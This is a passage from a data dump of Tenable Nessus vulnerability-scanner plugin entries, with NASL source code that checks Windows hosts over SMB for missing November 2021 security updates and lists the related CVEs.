The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154984);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007233\");\n script_xref(name:\"MSKB\", value:\"5007236\");\n script_xref(name:\"MSFT\", value:\"MS21-5007233\");\n script_xref(name:\"MSFT\", value:\"MS21-5007236\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007233: Windows Server 2008 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007233\nor cumulative update 5007236. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42285, CVE-2021-42287,\n CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007233 or Cumulative Update KB5007236.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007233', '5007236');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007233, 5007236])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:40:08", "description": "The remote Windows host is missing security update 5007245 or cumulative update 5007245. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007245: Windows Server 2012 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007245.NASL", "href": "https://www.tenable.com/plugins/nessus/154995", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154995);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007245\");\n script_xref(name:\"MSKB\", value:\"5007260\");\n script_xref(name:\"MSFT\", value:\"MS21-5007245\");\n script_xref(name:\"MSFT\", value:\"MS21-5007260\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007245: Windows Server 2012 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007245\nor cumulative update 5007245. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007260\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007245 or Cumulative Update 5007260.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007245', '5007260');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007245, 5007260])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:39:09", "description": "The remote Windows host is missing security update 5007255 or cumulative update 5007247. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007255: Windows Server 2012 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007255.NASL", "href": "https://www.tenable.com/plugins/nessus/154996", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154996);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007255\");\n script_xref(name:\"MSKB\", value:\"5007247\");\n script_xref(name:\"MSFT\", value:\"MS21-5007255\");\n script_xref(name:\"MSFT\", value:\"MS21-5007247\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007255: Windows Server 2012 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007255\nor cumulative update 5007247. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007255\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007247\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007255 or Cumulative Update 5007247.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007255', '5007247');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007255, 5007247])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2022-05-24T15:40:08", "description": "The Windows installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007207: Windows 10 LTS 1507 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007207.NASL", "href": "https://www.tenable.com/plugins/nessus/154987", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154987);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSFT\", value:\"MS21-5007207\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007207: Windows 10 LTS 1507 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component\n to deny system or application services.\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive\n information.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007207\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-11';\nkbs = make_list(\n '5007207'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007207])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:39:09", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42276, CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007215: Windows 11 Security Updates (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007215.NASL", "href": "https://www.tenable.com/plugins/nessus/154997", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
